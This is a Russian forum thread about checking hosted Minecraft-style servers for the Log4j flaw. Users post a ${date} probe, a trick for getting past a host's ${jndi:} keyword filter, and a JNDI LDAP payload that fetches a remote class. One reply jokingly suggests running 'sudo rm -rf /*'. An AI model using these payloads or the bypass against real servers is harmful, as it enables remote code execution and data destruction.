Уязвимость Log4j как узнать что сервер уязвим?

nilas

Заблокирован
Сообщения
208
каким образом проверить что могут взломать сервер?
или он не угрожает серверам которая не на вдс/дедик а на хостинг панели?
 
каким образом проверить что могут взломать сервер?

или он не угрожает серверам которая не на вдс/дедик а на хостинг панели?
Зависит от хостинга. Все нормальные должны были исправить это.
 


Зависит от хостинга. Все нормальные должны были исправить это.
Пишут что от ядра сервера тоже зависит.
у меня панельный хостинг туда не загрузить эту программу.
 
Пишут что от ядра сервера тоже зависит
Если это исправено в ядре - то это исправено в ядре. Если это не исправлено в ядре, то это не исправлено в ядре. Ауф.
В оф.ядрах пейпер всё исправлено на всех версиях.
Самый простой же способ проверить твоё ядро - прописать в консоли say ${date:YYYY}
Выбило дату - ты подвержен
Объединено

Интересный факт. На одном панельном хосте есть защита от такого мусора, НО только если ты пишешь ${jndi:***} непосредственно

В то же время ${${env:ENV_NAME:-j}ndi:***}, который имеет тот же самый эффект - спокойно проходит
 
Интересный факт. На одном панельном хосте есть защита от такого мусора, НО только если ты пишешь ${jndi:***} непосредственно

В то же время ${${env:ENV_NAME:-j}ndi:***}, который имеет тот же самый эффект - спокойно проходит
я еще видел хостинг который не дает возможность создать файл с именем pluginmetrics.jar. неужели нельзя нормально фиксы делать а не просто блокировать ввод жнди?
 
Будьте осторожны с рекомендациями этого пользователя.
Если это исправено в ядре - то это исправено в ядре. Если это не исправлено в ядре, то это не исправлено в ядре. Ауф.
В оф.ядрах пейпер всё исправлено на всех версиях.
Самый простой же способ проверить твоё ядро - прописать в консоли say ${date:YYYY}
Выбило дату - ты подвержен
Объединено


Интересный факт. На одном панельном хосте есть защита от такого мусора, НО только если ты пишешь ${jndi:***} непосредственно

В то же время ${${env:ENV_NAME:-j}ndi:***}, который имеет тот же самый эффект - спокойно проходит
Ввел,дату выбило но толку? Как запустить тот же sh start.sh чтобы убедиться что сервер защищён?
 
Ввел,дату выбило но толку?
Выбило дату - может выполнить код.

Как запустить тот же sh start.sh чтобы убедиться что сервер защищён?
Подробный гайд как пользоваться и репозиторий на гитхабе. Шаришь в жабе - напиши код который тебе выполнит команду sudo rm -rf /*, будет тебе веселуха.
You must be registered for see medias
 
Выбило дату - может выполнить код.


Подробный гайд как пользоваться и репозиторий на гитхабе. Шаришь в жабе - напиши код который тебе выполнит команду sudo rm -rf /*, будет тебе веселуха.
You must be registered for see medias
Ха-ха - предлагаешь стереть хостинг?
 
Последнее редактирование:
Выбило дату - может выполнить код.


Подробный гайд как пользоваться и репозиторий на гитхабе. Шаришь в жабе - напиши код который тебе выполнит команду sudo rm -rf /*, будет тебе веселуха.
You must be registered for see medias
Так там не показывают как взломать сервер, ток как взломать чужой ПК.
 
Как минимум порты закрыты т.к панельные хосты дают два рандом порта.
В видео порты открыты т.к все делается в одной внутренней сети.
При чем тут порты на твоем компьютере, если код выполняется на утсройстве не зависимо от того открыты ли у него порты? Если по указанному адресу есть класс с кодом который можно выполнить - машина его выполнит.
 
При чем тут порты на твоем компьютере, если код выполняется на утсройстве не зависимо от того открыты ли у него порты? Если по указанному адресу есть класс с кодом который можно выполнить - машина его выполнит.
потому что:${jndi:ldap://10.10.10.10:1389/Log4JCE} зачем вводят на сервере?
 
Чтобы сервер обратился по этому IP и порту для выполнения кода Log4JCE
ну вот он обращается к компу который хочешь взломать? а мне надо сервер взломать а не чей-то пк
 
Будьте осторожны с рекомендациями этого пользователя.
Лол нет. Он обращается по ТВОЕМУ IP, на котором ты раззмещаешь вредоносный код
что то запутанно все, какой вбивать аипи если ты создал серв на хосте а не своем пк?
 
какой вбивать аипи если ты создал серв на хосте а не своем пк?
Придется открывать IP на компудахтере, что логично хреновый вариант
Объединено

Придется открывать IP на компудахтере, что логично хреновый вариант
IP бл... порты!
 
Назад
Сверху Снизу